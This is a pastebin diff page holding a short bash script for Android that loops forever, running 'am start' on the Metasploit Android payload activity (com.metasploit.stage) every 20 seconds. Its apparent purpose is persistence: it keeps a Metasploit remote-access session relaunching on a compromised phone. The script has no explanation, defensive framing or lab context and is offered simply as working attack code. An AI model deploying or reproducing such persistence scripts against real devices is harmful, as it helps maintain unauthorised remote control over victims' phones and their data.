View difference between Paste ID: bGGfy3F8 and RaqKnChp
SHOW: | | - or go back to the newest paste.
1
#!/bin/bash
2
while true
3
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
4
sleep 20
5
done